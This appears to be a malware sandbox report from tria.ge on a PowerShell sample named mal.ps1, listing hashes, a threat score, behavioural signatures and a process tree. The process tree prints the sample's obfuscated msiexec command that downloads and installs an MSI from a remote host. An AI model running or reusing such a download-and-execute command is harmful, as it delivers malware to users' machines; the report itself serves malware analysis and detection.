Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
29s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
20/04/2023, 13:40
Static task
static1
Behavioral task
behavioral1
Sample
mal.ps1
Resource
win7-20230220-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
mal.ps1
Resource
win10v2004-20230220-en
5 signatures
150 seconds
General
-
Target
mal.ps1
-
Size
181B
-
MD5
3721fd648f3c3beaeb254f4b0634e3eb
-
SHA1
dfcfcb9bb2aa8eeb2f161de8a87dfab9c8c50661
-
SHA256
e35b56d5f5d582028fb928ede2d82386954a2d21eb00b3209b47e2ff32817762
-
SHA512
d9b7fb79158946131854912b4810770acf66f9b13c536152353edd1cb3c98288c251dd98e6dea0b8ad916c6900591d7f2e24c585f5bbf575b83e18b8ebc055c1
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1684 msiexec.exe -
Unknown use of msiexec with remote resource 1 IoCs
pid Process 268 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1484 powershell.exe Token: SeShutdownPrivilege 268 msiexec.exe Token: SeIncreaseQuotaPrivilege 268 msiexec.exe Token: SeRestorePrivilege 1684 msiexec.exe Token: SeTakeOwnershipPrivilege 1684 msiexec.exe Token: SeSecurityPrivilege 1684 msiexec.exe Token: SeCreateTokenPrivilege 268 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 268 msiexec.exe Token: SeLockMemoryPrivilege 268 msiexec.exe Token: SeIncreaseQuotaPrivilege 268 msiexec.exe Token: SeMachineAccountPrivilege 268 msiexec.exe Token: SeTcbPrivilege 268 msiexec.exe Token: SeSecurityPrivilege 268 msiexec.exe Token: SeTakeOwnershipPrivilege 268 msiexec.exe Token: SeLoadDriverPrivilege 268 msiexec.exe Token: SeSystemProfilePrivilege 268 msiexec.exe Token: SeSystemtimePrivilege 268 msiexec.exe Token: SeProfSingleProcessPrivilege 268 msiexec.exe Token: SeIncBasePriorityPrivilege 268 msiexec.exe Token: SeCreatePagefilePrivilege 268 msiexec.exe Token: SeCreatePermanentPrivilege 268 msiexec.exe Token: SeBackupPrivilege 268 msiexec.exe Token: SeRestorePrivilege 268 msiexec.exe Token: SeShutdownPrivilege 268 msiexec.exe Token: SeDebugPrivilege 268 msiexec.exe Token: SeAuditPrivilege 268 msiexec.exe Token: SeSystemEnvironmentPrivilege 268 msiexec.exe Token: SeChangeNotifyPrivilege 268 msiexec.exe Token: SeRemoteShutdownPrivilege 268 msiexec.exe Token: SeUndockPrivilege 268 msiexec.exe Token: SeSyncAgentPrivilege 268 msiexec.exe Token: SeEnableDelegationPrivilege 268 msiexec.exe Token: SeManageVolumePrivilege 268 msiexec.exe Token: SeImpersonatePrivilege 268 msiexec.exe Token: SeCreateGlobalPrivilege 268 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1484 wrote to memory of 268 1484 powershell.exe 28 PID 1484 wrote to memory of 268 1484 powershell.exe 28 PID 1484 wrote to memory of 268 1484 powershell.exe 28 PID 1484 wrote to memory of 268 1484 powershell.exe 28 PID 1484 wrote to memory of 268 1484 powershell.exe 28
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\mal.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" iCk=fY nJTVIAFbu=wsUIOgdO MGGpi=klLubBElx /I HTtp://Zxn.FYi:8080/AY/y6z4ru6PiSU/EzJ6YyZvtXTpANwTR/NICHQ-LTG2-052?okean wjR=KGIwmJf -QN rJqlWJ=jqNwQH izJnS=bvioV rMAai=AfWR2⤵
- Unknown use of msiexec with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1684